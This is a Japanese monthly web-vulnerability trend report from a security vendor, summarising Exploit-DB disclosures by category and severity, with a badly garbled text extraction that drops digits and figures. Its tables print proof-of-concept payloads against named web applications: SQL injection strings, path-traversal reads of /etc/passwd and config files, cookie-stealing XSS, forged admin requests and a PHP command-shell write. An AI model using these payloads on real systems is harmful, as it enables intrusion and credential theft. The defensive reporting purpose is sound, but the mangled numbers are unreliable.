itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E



Similar documents
最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム

最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5


最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年

ハピタス のコピー.pages

Copyright 2008 All Rights Reserved 2

相続支払い対策ポイント

150423HC相続資産圧縮対策のポイント

<4D F736F F F696E74202D E A B D682CC91E3955C93498D558C822E707074>

Ver.30 改 版 履 歴 版 数 日 付 内 容 担 当 V /09/5 初 版 発 行 STS V /0/8 証 明 書 バックアップ 作 成 とインストール 手 順 追 加 STS V /0/7 文 言 と 画 面 修 正 STS V..30 0//6

初心者にもできるアメブロカスタマイズ新2016.pages

- 2 Copyright (C) All Rights Reserved.

自 己 紹 介 企 業 組 織 のネットワークにセキュリティー 機 器 を 配 置 発 生 するアラートをSOCへ 集 約 アラートをSOCが 分 析 し 必 要 に 応 じてお 客 様 へご 連 絡 対 応 を 助 言 お 客 様 ネットワーク Security Operation Center

Copyright 2006 KDDI Corporation. All Rights Reserved page1

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

やよいの顧客管理

弥生給与/やよいの給与計算

弥生 シリーズ

弥生会計 プロフェッショナル/スタンダード/やよいの青色申告

弥生会計/やよいの青色申告

弥生会計 ネットワーク/プロフェッショナル2ユーザー

Webアプリケーション脆弱性診断 ~WebSiteScan Pro~

Copyright All Rights Reserved. -2 -!

IPA:セキュアなインターネットサーバー構築に関する調査

Microsoft Word - 最終版 バックせどりismマニュアル .docx

最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

タイトルを1~2行で入力 (長文の場合はフォントサイズを縮小)

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF

Copyright 2009, SofTek Systems, Inc. All rights reserved.

untitled

Copyright Qetic Inc. All Rights Reserved. 2

Releases080909


健康保険組合のあゆみ_top

リバースマップ原稿2

MultiPASS Suite 3.20 使用説明書

<4D F736F F D2090C389AA8CA72D92F18F6F2D D F ED28CFC82AF91808DEC837D836A B E838B A815B816A2E646F6378>

疑わしい取引の参考事例


2. データを 検 索 する なごやコレクションのデータを 検 索 するための 方 法 として キーワード 検 索 詳 細 検 索 の 二 通 りの 検 索 方 法 が あります 2.1. キーワードから 探 す キーワードを 入 力 する トップページの 入 力 ボックスに 検 索

ict8.key

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ

スライド 1

PPTテンプレート集 ver.1.0

Ⅴ 古陶器にみる装飾技法

MultiPASS B-20 MultiPASS Suite 3.10使用説明書


Copyright 2017 JAPAN POST BANK CO., LTD. All Rights Reserved. 1

Copyright 2008 NIFTY Corporation All rights reserved. 2

untitled

Flash Player ローカル設定マネージャー

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.14 P.15 P.16 P.16 P.17 P.19 P.20 P.22 P P P P P P P P P

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P.10 P.12 P.13 P.14 P.14 P.15 P.17 P.18 P.20 P P P P P.25 P.27 P.28 Copyright 2016 JAPAN POST BA

KDDI

本 日 の 講 演 内 容 ウェブ 改 ざんの 事 例 改 ざんの 原 因 (サーバ 側 ftpクライアント 側 ) 防 ぐための 管 理 (サーバ 側 ftpクライアント 側 ) 気 づくための 管 理 改 ざん 被 害 発 生 時 の 対 処 1

スマートコネクト マネージドサーバ WAFオプション仕様書

2


1000 Copyright(C)2009 All Rights Reserved - 2 -

IP IP All contents are Copyright (c) All rights reserved. Important Notices and Privacy Statement. page 2 of 39

JSOC INSIGHT Vol.9 1 はじめに エグゼクティブサマリ JSOC における 重 要 インシデント 傾 向 重 要 インシデントの 傾 向 発 生 した 重 要 インシデントに 関 する 分 析 大 量

PowerPoint プレゼンテーション

! Copyright 2015 sapoyubi service All Rights Reserved. 2

Windows Server2003環境向け Deep Security 推奨ポリシーの考え方 と適用イメージ

report03_amanai.pages

1.2. ご 利 用 環 境 推 奨 ブラウザ Internet Explorer Google Chrome(バージョン 32 時 点 で 動 作 確 認 済 み) Mozilla Firefox(バージョン 26 時 点 で 動 作 確 認 済 み) Safari 7

report05_sugano.pages

SENZOKUポータル

2


Office 10 パッケージ版「リンク集」

項 目 設 定 設 置 可 能 項 目 数 100 項 目 投 票 フォームの 設 置 可 能 投 票 項 目 数 1 項 目 (10 選 択 肢 ) 必 須 項 目 設 定 条 件 項 目 設 定 添 付 ファイル 合 計 容 量 入 力 項 目 を 必 須 項 目 に 設 定 できます フォーム

Fuji Xerox Co., Ltd. All rights reserved.

ビジネス化がさらに加速するサイバー攻撃

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.13 P.15 P.16 P.17 P.17 P.18 P.20 P.21 P.23 P P P P P P P P.31

untitled

42

目 次 1 はじめに 本 資 料 公 開 の 経 緯 平 成 20 年 度 仕 様 との 主 な 差 分 ウェブ 健 康 診 断 とは ウェブ 健 康 診 断 診 断 内 容 診 断 対 象 脆 弱 性 ( 診 断

- 2 Copyright (C) All Rights Reserved.

dekiru_asa

text

Imperva_page01_B52

pex7_manual

ポップアップブロックの設定

2


「はぴeみる電」をご利用するにあたって

1.1 評 価 サマリー 作 業 手 順 に 関 しては 全 体 的 に 誤 謬 防 止 やデータの 整 合 性 を 保 つためのチ ェックが 組 み 込 まれており 支 障 の 無 い 水 準 と 評 価 できます 一 部 作 業 漏 れチェックの 不 があったので 今 後 は 手 順 に 含 む

how-to-decide-a-title

Microsoft Word - MC_v4.1.1_Release_Notes_Japanese.doc

DC9GUIDEBook.indb

URL AdobeReader Copyright (C) All Rights Reserved.

(c) 2013 TOYOTA DIGITAL CRUISE, INC. All Rights Reserved.

Windows Oracle -Web - Copyright Oracle Corporation Japan, All rights reserved.

Transcription:

04.0

itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 EDB-Report 最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた 脆 トレンド 情 報 です サマリー ペンタセキュリティシステムズ 株 式 会 社 R&Dセンター データセキュリティチーム 04 年 月 は Exploit-DBより 公 開 されている 脆 の 中 SQL Injection クロスサイト 要 求 偽 造 (Cross Site Request Forgery:CSRF) ローカルファイル 挿 入 (Local File Inclusion:LFI)のような 代 表 的 な 攻 撃 が 多 く 見 られた 月 です 攻 撃 実 行 の 難 易 度 は 易 と 判 断 されるパターンが 多 いものの 危 険 度 は 高 と 分 類 されるパターンが69% 早 急 対 応 要 と 分 類 されるパターンが6% 見 られ 簡 単 に 実 行 できる 攻 撃 パターンでクリティカル な 被 害 を 及 ぼす 可 能 性 があるため 管 理 者 は 格 別 な 注 意 を 払 う 必 要 があります 主 なソフトウェア 別 脆 ではの 脆 が 多 く 報 告 されているため 同 ソフトウェアを 利 用 しているお 客 様 は 報 告 されている 脆 に 対 応 可 能 な 最 新 バージョンでパッチをし 対 応 することを 推 奨 致 します. 脆 別 件 数 脆 カテゴリ 件 数 SQLインジェクション (SQL Injection) 7 ローカル ファイル 挿 入 (Local File Inclusion:LFI) 9 クロスサイト 要 求 偽 造 (Cross Site Request Forgery:CSRF) 7 クロス サイト スクリプティング 5 (Cross Site Scripting:XSS) クッキー 偽 造 (Cookie Poisoning) 合 計 39 8 6 4 0 8 6 4 0 7 9 脆 別 件 数 7 5. 危 険 度 別 件 数 危 険 度 件 数 割 合 早 急 対 応 要 0 6% 高 7 69% 中 5% 合 計 39 00% 危 険 度 別 件 数 0 早 急 対 応 要 高 中 7 3. 攻 撃 実 行 の 難 易 度 別 件 数 難 易 度 件 数 割 合 難 0 6% 中 7 69% 易 5% 合 計 39 00% 攻 撃 実 行 の 難 易 度 別 件 数 0 7 難 中 易 4. 主 なソフトウェア 別 脆 発 生 件 数 ソフトウェア 名 itechclassifieds Middle School Page Horizon QCMS myseatxt 0.34 Joomla JV Comment Extension PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 合 計 件 数 3 39 4 0 8 6 4 0 主 なソフトウェア 別 脆 発 生 件 数 3 itechclassifieds Middle School Page Horizon QCMS myseatxt 0.34 Joomla JV Comment Extension PizzaInn_Project 危 険 度 分 類 基 準 早 急 対 応 要 : 攻 撃 が 成 功 した 場 合 システムへ 侵 入 可 高 :システム 情 報 を 取 得 するか あるいはクライアントに 次 被 害 を 及 ぼす 中 : 情 報 漏 洩 攻 撃 実 行 難 易 度 分 類 基 準 難 : 複 数 の 脆 を 突 いた 攻 撃 パターン 対 象 のシステムの 重 要 な 情 報 を 取 得 するため 高 度 な 攻 撃 コードを 採 用 したパターン 知 らされていない 攻 撃 コードを 採 用 したパターンのいずれかに 該 当 する 中 : 攻 撃 手 法 自 体 は 難 しくないが 迂 回 コードを 採 用 したパターン 易 : 回 のリクエストで 攻 撃 が 成 立 するパターン 複 数 回 トライするも 既 知 の 攻 撃 コードを 採 用 したパターンのいずれかに 該 当 する Copyright 04 Penta Security Systems Inc. All rights reserved

最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた 脆 トレンド 情 報 です ** 5 件 以 上 発 生 した 主 なソフトウェア 別 脆 の 詳 細 情 報 EDB 番 号 脆 カテゴリ 攻 撃 難 易 度 危 険 度 脆 名 ソフトウェア 名 3093 SQL 中 高 Event Calendar - load-calendar.php SQL 3093 CSRF 易 高 Event Calendar - load-calendar.php SQL 309 XSS 易 高 Car Rental Script - index.php XSS 脆 309 CSRF 易 高 Appointment Scheduler.0 - index.php CSRF 脆 309 LFI 易 高 Appointment Scheduler.0 - index.php LFI 脆 3090 CSRF 易 高 Appointment Scheduler.0 - index.php CSRF 脆 30955 CSRF 易 高 Rental Script - index.php CSRF 脆 30955 LFI 易 高 Rental Script - index.php LFI 脆 30954 LFI 易 高 Hotel System - index.php LFI 脆 30954 CSRF 易 高 Hotel System - index.php CSRF 脆 30953 CSRF 易 高 Packages Listing - index.php CSRF 脆 30953 LFI 易 高 Packages Listing - index.php LFI 脆 30950 CSRF 易 高 Pet Listing Script - index.php CSRF 脆 Copyright 04 Penta Security Systems Inc. All rights reserved

日 付 EDB 番 号 脆 カテゴリ 攻 撃 難 易 度 危 険 度 脆 名 攻 撃 コード 対 象 プログラム 対 象 環 境 04//4 30689 SQL Injection 易 早 急 対 応 要 Taboada Macronews news_group.php SQL EDB-Report 最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた 脆 トレンド 情 報 です /news_popup.php?id='%0union%0all%0s ELECT%0,,3,concat('a','b','c')--%0 Taboada Macronews Taboada Macronews V.0 04//7 30790 SQL Injection 易 早 急 対 応 要 Cubic CMS agent.php SQL /agent.php?resource_id=- OR 'foobar' UNION SELECT user()-- cms 04//7 30790 LFI 易 高 04//7 30786 SQL Injection 易 早 急 対 応 要 04//7 30786 XSS 易 中 04//4 3097 LFI 易 高 04//4 3097 SQL Injection 易 早 急 対 応 要 Cubic CMS agent.php LFI 脆 Middle School Page - View.php SQL Middle School Page - View.php XSS 脆 弱 性 Horizon QCMS - d- load.php LFI 脆 Horizon QCMS - download.php SQL /agent.php?path=/../../application/config/project.ini /view.php?class=null+and+=+union+select+,concat(name,0x3a,pass)+from+teachinfo /view.php?class=<script>alert(document.cookie) ;</script> /d-load.php?start=../../config.php /download.php?category=%7%0union%0sel ect%0,,version(),4,5,6%0--%0 Middle School Page Middle School Page cms Middle School Page.3 Beta Middle School Page.3 Beta Horizon QCMS Horizon QCMS 4.0 Horizon QCMS Horizon QCMS 4.0 04//4 3096 Cookie Poisoning 04//4 3093 SQL Injection 中 高 04//4 3093 CSRF 易 高 04//4 309 XSS 易 高 易 高.8. - login.php SQL Event Calendar - loadcalendar.php SQL Injection 脆 Event Calendar - loadcalendar.php SQL Injection 脆 Car Rental Script - index.php XSS 脆 GET /login.php HTTP/. Cookie: burden_user_rememberme=; /loadcalendar.php?view=&month=6&year=03&cid =+and+substring(@@version,,)=4 /index.php?controller=adminevents&action=crea te HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 event_create=&category_id=&event_title=<sc ript>alert(document.cookie);</script>&event_de scription=&event_max_people=&event_colo r=ffcc00&start[]=04-0- 00:00&end[]=04-0- 00:00&title[]=Regular price&price[]=888&repeat_every=&repeat_ends =04-0- /index.php?controller=admins&action=in dex&p_date=<script>alert(document.cookie);</ script>.8. Event Calendar.0 Event Calendar.0 Car Rental Script 04//4 309 CSRF 易 高 Appointment Scheduler.0 - index.php CSRF 脆 /index.php?controller=pjadminservices&action= pjactioncreate HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Appointmen t Scheduler.0 service_create=&i8n[][name]=<script>alert( document.cookie);</script>&i8n[][description ]=Iphobos Blog&price=00&length=&before=&after=&t otal=3&is_active= 04//4 309 LFI 易 高 Appointment Scheduler.0 - index.php LFI 脆 Download&id=../../../../../app/config/db.inc.php Appointmen t Scheduler.0 Copyright 04 Penta Security Systems Inc. All rights reserved

最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた 脆 トレンド 情 報 です 日 付 EDB 番 号 脆 カテゴリ 攻 撃 難 易 度 危 険 度 脆 名 攻 撃 コード 対 象 プログラム 対 象 環 境 04//4 3090 CSRF 易 高 Job Listing Script - index.php CSRF 脆 /index.php?controller=admincategories&action= create HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Job Listing Script category_create=iphobos Blog&category_title=<script>alert(document.coo kie);</script> 04//5 30955 CSRF 易 高 Rental Script - index.php CSRF 脆 /index.php?controller=pjadminfeatures&action= pjactioncreate HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Rental Script 3.0 feature_create=&i8n[][name]=<script>alert (document.cookie);</script>&i8n[3][name]=&i 8n[][name]= 04//5 30955 LFI 易 高 04//5 30954 LFI 易 高 Rental Script - index.php LFI 脆 Hotel System - index.php LFI 脆 Download&id=../../../../../../../../etc/passwd Download&id=../../../../../../../../etc/passwd Rental Script 3.0 Hotel System 3.0 04//5 30954 CSRF 易 高 Hotel System - index.php CSRF 脆 /index.php?controller=pjadminrooms&action=pj ActionCreate HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Hotel System 3.0 room_create=&i8n[][name]=<script>alert(d ocument.cookie);</script>&i8n[3][name]=&i8 n[][name]=&i8n[][description]=iphobos&i8 n[3][description]=&i8n[][description]=&adults =&children=0&cnt= 04//5 30953 CSRF 易 高 Packages Listing - index.php CSRF 脆 /index.php?controller=pjadmincountries&action =pjactioncreate HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Packages Listing.0 country_create=&i8n[][name]=<script>alert (document.cookie);</script>&i8n[3][name]=&i 8n[][name]= 04//5 30953 LFI 易 高 Packages Listing - index.php LFI 脆 Download&id=../../../../../../../../etc/passwd Packages Listing.0 Copyright 04 Penta Security Systems Inc. All rights reserved

最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた 脆 トレンド 情 報 です 日 付 EDB 番 号 脆 カテゴリ 攻 撃 難 易 度 危 険 度 脆 名 攻 撃 コード 対 象 プログラム 対 象 環 境 04//5 30950 CSRF 易 高 Pet Listing Script - index.php CSRF 脆 /index.php?controller=adminbreeds&action=crea te HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Pet Listing Script.0 breed_create=&breed_title=<script>alert(docu ment.cookie);</script>&type_id= 04//5 30946 SQL Injection 難 早 急 対 応 要. - managetimetracker.php SQL /managetimetracker.php?action=projectpdf&id= %0and(select%0%0from(select%0count( *),concat((select%0(select%0(select%0dis tinct%0concat(0x7e,0x7,cast(schema_name% 0as%0char),0x7,0x7e)%0FROM%0inform ation_schema.schemata%0limit 0,))%0from%0information_schema.tables% 0limit 0,),floor(rand(0)*))x%0from%0information _schema.tables%0group%0by%0x)a)%0an d%0=. 04//3 3087 SQL Injection 中 早 急 対 応 要 <= v0.83 - indexdate.php SQL /indexdate.php?ids=77%0union%0select% 0,,3,loginUtilisateur,5,6,passUtilisateur,8,9, 0,,,3,4,5%0from%0domphp_utilisate urs--%0 <= v0.83 04//7 305 SQL Injection 易 早 急 対 応 要 0.5.0 - index.php SQL Injection 脆 /index.php?login=true HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 bloofox CMS 0.5.0 login=login&password=iphobos&username= %0or%0=--%0 04//7 305 LFI 易 高 0.5.0 - index.php LFI 脆 /index.php?mode=settings&page=editor HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 bloofox CMS 0.5.0 file=<?php%0system($_get[cmd]);%0?>$fil eurl=languages/deutsch.php&fileurl=../language s/deutsch.php$send=save 04// 30865 LFI 易 高 <= v0.83 - index.php LFI 脆 /index.php?urlancien=&url=../../ <= v0.83 04//0 3085 XSS 易 高 - index.php XSS 脆 /index.php?action=showprofile&profile=<script> alert('dr.nano')</script> 04//3 346 XSS 易 中 3.3 - errmsg.php XSS 脆 /errmsg.php?msg=%3c%fp%3e%3cscript%3e alert%8%7xss%7%9%3b%3c%fscript% 3E%3Cp%3E 3.3 04//3 346 SQL Injection 易 早 急 対 応 要 04//3 344 SQL Injection 易 高 3.3 - user.php /user.php?pcid=%0or%0=--%0 SQL myseatxt 0.34 - /autocomplete_res.php?term=99%7%0or%0 autocomplete_res.php SQL =--%0 myseatxt 0.34 3.3 myseatxt 0.34 04//3 343 SQL Injection 易 高 PizzaInn_Project - reserveexec.php SQL Injection 脆 /reserve-exec.php?id=%7%0or%0=-- %0 PizzaInn_Proj ect PizzaInn_Pr oject Copyright 04 Penta Security Systems Inc. All rights reserved

最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた 脆 トレンド 情 報 です 日 付 EDB 番 号 脆 カテゴリ 攻 撃 難 易 度 危 険 度 脆 名 攻 撃 コード 対 象 プログラム 対 象 環 境 04//3 34 SQL Injection 易 早 急 対 応 要 Simple e-document.3 - login.php SQL Injection 脆 /login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Simple e- document Simple e- document.3 username=- 473%7+OR+%8708%3D708%9%3&pa ssword=&op=login&submit=login 04//3 34 SQL Injection 易 高 godontologico 5 - index_ajax.php SQL /index_ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 godontologico 5 godontologi co 5 usuario=%0or%0=&senha=%70%6%73 %73&login=%4C%6F%67%69%6E 04//3 340 SQL Injection 易 高 itechclassifieds 3.03.057 - ChangeEmail.php SQL /ChangeEmail.php?PreviewNum=%7union% 0select%0null,null--%0 itechclassifie ds itechclassif ieds 3.03.057 04//3 340 SQL Injection 易 高 itechclassifieds 3.03.057 - ViewCat.php SQL Injection 脆 /ViewCat.php?CatID=%0or%0=--%0 itechclassifie ds itechclassif ieds 3.03.057 04//4 375 SQL Injection 難 早 急 対 応 要 Joomla JV Comment Extension 3.0. - index.php SQL Injection 脆 /index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 option=com_jvcomment&task=comment.like&id =%0AND%0=(select%0min(@a:=)from %0(select%0%0union%0select%0)k% 0group%0by%0(select%0concat(@@version, 0x0,@a:=(@a+)%))) Joomla JV Comment Extension Joomla JV Comment Extension 3.0. 04//4 373 LFI 易 高..3 - index.php LFI 脆 /index.php?action=view&script=%f..%f..%fe tc/passwd..3 04//4 373 XSS 易 高..3 - session.php XSS 脆 /session.php?<script>alert(%7xss%7)</scrip t>..3 04//4 37 SQL Injection 易 高..3 - redirect.php SQL /redirect.php?action=url&goto=%0or%0= --%0 XOS XOS Shop.0 rc7o Copyright 04 Penta Security Systems Inc. All rights reserved